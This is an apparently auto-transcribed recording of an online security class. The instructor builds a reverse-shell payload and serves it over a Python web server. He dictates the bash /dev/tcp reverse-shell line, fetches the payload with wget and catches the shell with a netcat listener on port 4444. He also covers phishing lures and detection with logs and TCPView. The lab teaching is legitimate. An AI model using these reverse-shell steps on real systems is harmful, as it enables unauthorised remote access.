record. Hey, this is not a right. Just give me a minute. I try to shift my network. Okay, just give me a minute. Right now it will work properly. Yeah. So now everything's out of fine. What happened? Yeah. So here we can able to see there are different types of foods. So here next, so you can see the Linux having like 64 meter Peter and the same command. What the command I have showed you, the same command you can see it from here, and this is for the Windows. And same way, if you want to create some virus file you for PHP, right? You can use this command. So if you want to create for the ISP for this, as you can see some war files are there, and for Python, so you can use some shell. So any file you can able to create, but the payload will be the different for each and every files. So based on that payload, the command, I mean, the working functional will get different. Okay, so here what I'm doing, so instead of giving this file, right, the Linux x64 Peter, I will use the shell code here. So because it's easy for me to take the shell code to my target system. Okay, so what I'm doing, I'm just copying this shell code and I'm pasting in my Linux. Here just I'm going to change the IP address and the port number. IP address, I know that. So 192.168.1.52. Okay, so I'll just check here once again what is the IP of my system. So if config, yeah, this is the actual IP of my system because I just changed the network, right? That's why the IP got changed. So I'm just going to use this IP for the L host, and the I port will be the same. So IP will get changed, but the port, the way it depends upon me. So I'm going to use the same port number 444. And here I'm just showing that there is a raw or raw in the sense. I mean, if there is any specific operating system extension, you need to mention that particular extension. If you're going to generate some program files, you can use the raw, and that raw in the sense directly it will give the code. So instead of showing the code, I'm saying that just paste it to the shell.sh file. Okay, so I'm giving like this. So just a minute, it will create one small yeah, so you can see here there is a for file shell.sh got created successfully, and the memory of the size will be 70 bytes. So if you see here shell.sh will be there. Okay, so what I'm doing, the shell.sh, shell.sh. So you can see what actual code will be the inside. Okay, this is the basic bash script. Okay, so what I'm going to do now, I'm going to take this script and I'm going to execute on my target. Okay, so here this is the actual script. So this is my target system. Okay, so I'm just MSF admin. So MSF admin. So this is my target system. Okay, if config, you can see the IP of my system. Both will be the same network. So this is start from 192.160. Oh, sorry, 172.20.10.13. The same IP I'm going to use here as well. Same Wi-Fi network IP. Okay, you can see my IP. Okay, 172.20.10.6. Okay, same network IP. Okay. Okay, I'm just copying this command. Why I'm specifically selecting the shell script? The reason is like shell script used for every in all the Linux. Okay, so there is no specific things like okay, you need to run some compiler to execute that shell scripts. Okay, shell script is the basic in the Linux. So even the whatever the commands you are using, we are using ls, mkdir, then we are using so much of commands, right? Linux commands. Whatever the commands we saw in the last 2 days, all the commands are shell based commands. Okay, even if you want to create a new commands, so instead of giving ls, so the ls will show you some files, right? If you want to create some new command like good, if you tap the name of good, if you want to see this same activities like a ls, right, you can create. Okay, so based on the shell script you can do that. Okay, so now what I'm going to do, I'm going to paste that particular command here. So I'll just, I can't able to copy paste, I can able to type easily here. Or else I can do one thing. So I can activate the web service on my Kali system from using web service, I can able to transfer the data to my target. Okay, so what I'm doing, I'm just using some Python 3, Python 3 space -m http dot server. Okay, so it's like a Python based web service. Yesterday, I mean, last to today, I just show you one command service Apache to start. That is a service will help to transfer some. I mean, show you can able to activate the web service. I show you that command. Same way, instead of Apache, what I'm doing here, I'm using the Python 3. Okay, by using the Python also, I can able to activate the web service. Okay, so if I run the service Apache 2, so the web service will activated in the port number 80. If I use the Python, the web service will activate in the port 8000. Okay, so each and every service, even there is a different service for the activating the web service, right? So if the both service having the same port number, so sure you will have some conflicts. So if you have the two different types of web service and running on the different port numbers, so then it will not there is no problem. You can use that service. Okay, so I'm just copying this IP. So 172.20.10.6. Okay, so what I'm going to do, I have a command to transfer this shell.sh to this system. Okay, so wget is the command. So wget space http colon double slash 172.20.10.6 slash shell.sh. Okay, if I give this, so you see that, oh, sorry, wget. And yeah, sorry, instead of wget, I just given the get. Wait, okay, wget. See, connection refused. Oh, sorry. So it's running in the port 8000, right? I just want to mention port 8000 here because if you give normally without port 8000, then it considered as a port 80. So port 80, there is no services running in my system. I mean, in Kali. Okay, so if I give like this, see that it will take time and it will download the shell.sh from the system. Okay, and you should make sure that the same name, the shell.sh name and the main name mentioned here both look similar. Okay, I'll make sure what is the IP of my system. I mean this target. It's taking so much of time. So you'll get the attendance link from that everyone chat. Okay, so it's taking time. So better I will do one thing. Sound for 20.10.6. Yeah, I can ping successfully. So I will do one thing. I'll just type the command. Whatever the command I see here, I'll just type it from just wget, sorry, bash space hyphen c space. I can't do the copy paste because this system don't have that. I mean, this particular the target have don't have the features to copy paste. Okay, so I just want to do some types. 0 and this is simple colon 85 hyphen semicolon exec space 85 greater than smaller than symbol slash dev slash tcp slash 172.20.10.6 slash 4444 sh. Then we have a few more comments. You can see it here. The 85, 85, 85. Okay. So before executing this command, what I'm going to do now, I'll just give again bash C. So what I'm going to do now, I'm going to create one small, I mean, I need to create a space to monitor that particular service. So here I have a tool called nc netcat. Okay. So I'll just give the command netcat space hyphen lnvp. I'll give the port number 4444. Okay. So now what I will do, I will execute the command here. Okay, this Kali will monitor my entire service. If I try, if there is a data is coming to Kali system via this particular port, then this will monitor and this will give you the I mean, place to execute the command. Okay. Okay, not taking anything. Just give me a minute, I'll connect one more system. One more way to connect the target system. Space. Then I'll do one thing. I'll just execute the virus file from my same system because so I already have the shell.sh file. So directly I'll execute bash add shell.sh. Whether I'll see it's got executed or not. So much of it. So okay, fine. Anyhow, you can see here there is a one of the point you can see once I executed this command, you see here, so initially it was still on the listening on any, and it's showing some port number. Okay, it shows some port number. You can see connect to some connecting to the IP from unknown to and IP you can see here. Okay. So it means that, so once I executed that particular virus file on my target system, right? So once I executed, you can able to see here you got a connections. Okay, so this is the virus file, because the thing is like I just plan to execute the virus file on my one of the target metasploitable, but so unfortunately it's not getting executed, but that's why I just run the virus file on directly on my Kali Linux. Okay, so once I run that, it's going to show that you will got the access. Okay, so after, if you, I mean, if it is not showing any error, if it's execute properly, right? So sure, you will get the complete access of the system, and you can use whatever the commands you are using in the Linux. All the commands you can execute here, and you can able to access the target system. Okay, this is the actual way of virusing. I mean, creating the malwares and executing the target system. The thing is like here, I just use the reverse shell, right? So that's why what happening here. So whatever the once I execute the virus file, it's transferring the data from my system to the target. So you just consider this terminal as my target, and this is my system. Okay, once I execute it, that's why data is coming to this system. Okay. So I got you got everyone got understand, and there is one more question I got from somebody. So that's saying that, I mean, asking the question like how the hackers will send the file to our system. Okay, so first thing is like if the hackers are targeting someone to attack through the malware, right? The first they will try to understand the target mindset, because they need to collect some of the data about the target. So then what the attackers will do, they will create some strategy to make you to click that file. Because if you're getting some file without having any information, sure with you not click that, because nowadays most of them are having awareness. Okay, so if the file is coming in this way, so we should not click that. So okay, so what the attackers will do, attackers will create some strategy. Okay, in which way you are so much of interesting, I mean, what are all the things you are having so much of interest, they will create some strategy. They will make you something like they will create some curiosity, or else they will make you fear to click that particular files. Okay, so then what you will do, you'll click that file and you will get the, you'll give the access to the target. So this is one of the way. The second way is like the phishing method. So they will not point out anybody like I need this person, this person. They'll just randomly throw that virus file, who are all capturing and who are all executing that file. So all are their targets. Okay, there is no specific person, only this person can able to do this and all. I mean, okay, I mean, no, there's no nothing like specific person to take the access. Okay, so that is a phishing way. So mostly nowadays, if you are getting some emails, and if there is you can think that okay, is that it's possible to transfer the virus over the mail. So that is very very rare, because emails and all nowadays nobody's are, most of them are not using, and most of them are not active in that. Okay, so the hacker will try. I mean, check the way from. I mean, which way is most familiar and easy to reach the persons. Okay, they will check only that particular target, even though there is some statistics. I mean, not the current statistics. So there are some statistics are saying that okay, most of the um, younger peoples are trying to do the attacks, and they are getting locked in that activities. Okay, the reason is that it's not related to the money, it's not related to the revenge. Okay, so the thing is like mostly whenever that they are doing some attacks, right? Because of the curiosity, they need to know what happens or what happened or what's going to happen. Okay, if they want so much of money, they can go any big organizations, or else they can go for some of the like Google or some of the company to earn the money. Okay, but mostly it's not related to the earning money. They are, they need, I mean, because of the curiosity, they are doing this type of activities. Okay, the second thing is like the attacks happening because of lack of awareness. So even we know that how the malwares will come, and there are different ways. Okay, even though we know that okay, we'll get some calls, or I mean, they will mention some of the I mean names related to your friend names, or else someone who is close with you. They will mention their name. So and they will ask some they will say some different things, and they will make you panic, and they will get some data from you. Okay, so this is also a type of way. And sometimes there are some of the attacks are happening like, so they are calling and they are make you to install that application, and once you go it's installed, right, they will get the access. Okay, so there is so much of way, but anyhow, we should aware on that. So where before, whenever you are getting the file, so you need to make sure before clicking that. And if you want to click and if you want to try that, okay, even though if it is a virus, if you want to try, you can try inside the virtual box like this. Okay, because if you use the virtual box, that will not affect your system. And make sure you just disconnect from your internet. Okay, before trying to get that file, okay, just disconnect from the internet, then you just try to execute. Okay, if you are getting something like whatever the things they are mentioned in that information, if you're getting the same, then fine. If you're not getting right, then you can just leave and you can move to the next activities. So that already in the group complete group chat, from there you can take. Yeah, sure. There are risks because malware is not a one thing. So it's a common. I mean, there are. I mean, it's a common name. There are different types of malware. So each and every malware will give. I mean, provide the damage. But based on the malware types, the execution models and the data. I mean, sometimes you will your system will get shortcut. It will not give you the information. Give the information to the attacker. Just it will create the shortcuts. So that is a one of the malware. So already before uh, creating this malware, I show that how what are the types of malwares are there and how the attackers will attack the not attack characters of the malwares. That everything we saw in that notepad. Sorry, I think I closed that file. Yeah, I knew there is a impact. So if the mostly we see that ransomware and trojans are nowadays, I mean, mostly in the internet. Okay, so mostly what the problem is like. So we are trying to install some of the some of the application in the crack model, right? That times we are getting that virus. Okay, so we need to think that okay, you're getting the you're getting the crack version, but what is the benefit for them? So they are not giving the crack version for free, right? They will not give that. Why should they? Even they have the they have a knowledge to do some create some crack version of the particular file. Okay, but even though they don't want to give it in the free model, they need something from us. That's why they are launching that file in the internet. So in the back end, they will get some data. Okay, even though we don't know that, okay, after some day we say that okay, I got affected by the malware. I don't know, something is happening in my system. I don't know what happening, and some suspicious activities are that. We'll think about that recent day activities, we'll think about some a week of activities, but we don't know what actually we did. We installed some files long time back. From that information only the attacker moved to the next level. Attendance links already here. I think it will not. I don't know. Okay. So and there is a way also you can able to find that. So the way will be like, so first thing. Okay. So if you are running some malware in some of the organizations and device, right? What they can easily identify, even though if you use the reverse shell, whatever you can do it, but easily they can able to monitor because so you just think this is your target. Okay. Okay. Target server. This server is like a Linux. Okay. So if you are sending some file and you are executing that malware here, so what happened? So you are, even though you are getting some data from here and you are trying to exchange some data, what they will do in there, they will store some logs, okay, for about this system. So each and every activity will monitor in some of the separate operating system. In that, if they see some of the unwanted posts, because that's why in every organizations, if they are creating the server, first what they will do, they will block all the port. Okay, then they will release only whatever the port they need for their, project purpose. Whatever the ports they need to use for the testing model, they will activate. Other ports, everything's or in the closed mode. Okay, so if there is a port is running something which is not running for the project related of services, right? Then what they will do, they will deep analysis on that particular port, and they will reject, block that port, and they will start finding who is doing that. Okay, and they will do some complaints, and they will file the lawsuit, and they will, because that's a data, right? So even if the small data is get out, so sure they will face so much of losses. Okay, because that if it may be their client details, it may be their organization employees details. So each and every data are important, right, for in the organizations. So they will take action immediately. Okay, so even though why they are creating so much of system, the thing is like, so you got the access of this system, right? Okay, so if you try to get access from here to here, meanwhile there is some breathing time, right? Meanwhile the security team will come, and they will do some analysis, and they will block this. Okay, so mostly what they will do, they will prevent, so which and all servers they are thinking as a critical server, important, critical in the sense important server. Whatever the server they are facing as feeling as an important server, they will create so much of what to say, prevention mechanisms. They will create firewall, logs, monitors, everything. Okay, so if there is a small activity happen, easily they can monitor, and they will stop that activity. Okay, this is also a way they can able to find. Okay, there is another one way, like, okay, so there is another one way. If there is any, say, suspicious file, if they saw, they will do that. They'll start monitoring. Okay, so there's one more tool called TCP. If we want to do some analysis in our local system, so we can download this tool, TCP View. This tool we used in forensics also, because this tool is provided by the Microsoft. Uh, Here under physicals, there are so much of tools. This is one of the tool you can do the monitoring. So we can use this tool for the forensic activities as well. So if you're, because the reason is like, this is a lightweight tool. So if someone, if you want to do analysis on some target, right, you can't able to install any high weightage tool. Like once you install, it will do some changes on the all the folder in the C drive, right? So if you're installing that type of tool, sure, some of the evidence will get changed. There is the changes of logs in the backend. So if we use this, it's a light will, it will not affect anything on the C drive. So directly for time being, it will open, then it will get closed. It will not store the TCP view data in anywhere of my system. Okay, so just extract this file. Right click. I just want to extract this. Checking time. Just give me a minute. It will extract. I don't know. My system also getting slow. Okay, so this is the actual file. You can directly open like this. File. it will ask you the permission to open. That's it, enough. So directly it will open here. So you can see the process name, what is the actual process file name, process ID in the sense the ID of each and every files. It's like a tag. So if you are running, if you are creating some services to run, it will create some ID. Okay, then you see there is a protocol. So under which protocol the all the services are running and status of that particular service, like listener mode, and from which IP to which IP its data is getting transferred and which port number is used to transfer the data. And you can see at what time this activities get started. And you can see that send packet and receive packet. Send packet in the sense how much of data is sent to your target and how much of data is received from the target. This all the information you can able to get, you can able to see here. If someone is seeing that, okay, for example, there are some packets are moving, right? So if someone see that, okay, so in Zoom you can see, sorry, just take the Zoom. Okay, in Zoom you see that there is a process ID. Okay, then it's in a established state because till now we are in the communications. So this is my IP, this is the Zoom target. Okay, so this is my port and this is the port of Zoom, and this is the actual file is running, and from you can see that their time. So around what time is what is the current time? See, you can see my time. Everything will got monitored, and you can see the amount of data got transfer from Zoom. Okay, so if I move here, see there are one packet is sending, one packet is receiving. All the activity you can see, and there are few more tools similar to this. Even you can see I mean the path of the file in the sense here we are just seeing that zoom.exe. Okay, so you can see if you click here you can see the path from where it's going to get running. Okay, so it's showing the tab data something, but some of the files show you that proper location of that particular file. So you can see the C drive location, everything properly. Okay. Okay, this is a tool you can use to monitor. So then there is a two other way of monitoring. So suspicious, you need to understand the common activities. So what activities will be run on your system for that time. I mean every time. Okay, for 12 o'clock, what activity will be there? For 1 o'clock, what activity will be run? So based on the activity, if any activities goes news, based on that also we can able to find. Okay, so normal system is very hard to find, but if you are in the organization level, so based on the activities also they can able to identify, and based upon the access. So if someone is using regularly, fine. If someone who is not using regularly, suddenly if that person is interacting with the server and they're getting the data from the server, and if the user is getting, I mean, accessing some unwanted files like which is not relevant to that particular user project, so that and all considered as a suspicious activity. So mostly they will not pay, they will take they will use their tool to record all the data. Okay, even though they will make sure this type of activity should not happen. Okay, because if that got happened, right, sure they will face lot of problem, like the clients or the clients problem projects or everything's with them only, with the client, I mean the on the server. So they will make sure to take the backup, and whatever the I mean instance action what they want to take, they will take that. Mostly they will not. So bias sim is not that much accuracy. So if you want, if they someone want to monitor your location, or they want to see from where, they need a geolocation. Then only they can able to point out specific locations. Even though if you are using SIM card, I mean SIM number to get, only will get the tower location, because tower location from I'm in one place, the tower may be in some other location. Maybe there's a gap between me and the tower will be 1 kilometer. Even you can't able to predict, okay, which direction I will be. So there's so much of complications. Nobody can able to, even if you want to try, you just try to ping my IP, you can't able to reach my, because I am in the private, I'm showing only the private IP. So private IP, nothing. Only if you are in my Wi-Fi network, you can do that. Other than that, you can't able to do anything with my system. So if you want to take my system data, that's one way. You need to create some virus and you need to send to me. Once I execute it, then only you can get the access. There's no other way, because this is my personal system. Yeah. So if you guys have any other doubts, you can ask me. I think everyone are clear with the today concept, and tomorrow we'll continue with this, and we'll see. Yeah. So if you guys have any doubts, you can ask me. Or else we consider today we are good to conclude. Okay. Uh, yeah, Shushmita, can you hear me?
Yes, sir. You're audible, yes, sir.
Yeah, yeah. So yeah, today we good to go.
Yeah, sure, sir. We
Yeah.
can write.
Yeah.
Yeah, as you all know, sir, like tomorrow and day after tomorrow, that's weekends, we don't have a session. And even Monday as well, behalf of Republic Day, we don't have a session. So we are meeting again on Tuesday evening at 7 p.m.
Yeah. Thank you.
Yeah, thank you, sir. Thank you so much. Yeah, so dear students, as informed, the weekend, Saturday and Sunday, we don't have a session. And also Monday is behalf of Republic Day, we are not conducting any session. So we are again meeting on Tuesdays evening at 7 p.m. You all can join in the same link which you have joined today. So I request, please join us back again on Tuesday evening at 7 p.m. Okay. So yeah, thank you all. Thank you for joining. Good night.